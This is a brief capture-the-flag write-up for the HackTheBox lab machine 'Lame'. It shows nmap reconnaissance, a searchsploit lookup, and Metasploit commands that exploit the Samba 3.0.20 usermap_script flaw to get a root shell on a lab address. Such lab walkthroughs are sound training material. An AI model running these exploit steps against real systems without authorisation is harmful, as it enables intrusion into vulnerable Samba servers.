Wróć do writeupów

Lame Writeup

Lame
Easy
Linux

Lame

Lame is one of the first machines on HackTheBox. It is a beginner-friendly Linux machine that requires exploiting a known vulnerability in Samba.

Recon

Running Nmap:

nmap -sC -sV -oA nmap/lame 10.10.10.3

We see port 445/tcp open (Samba 3.0.20-Debian).

Exploitation

Searching for exploits:

searchsploit samba 3.0.20

We find Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit).

Using Metasploit:

  1. use exploit/multi/samba/usermap_script
  2. set RHOSTS 10.10.10.3
  3. exploit

And we get a root shell!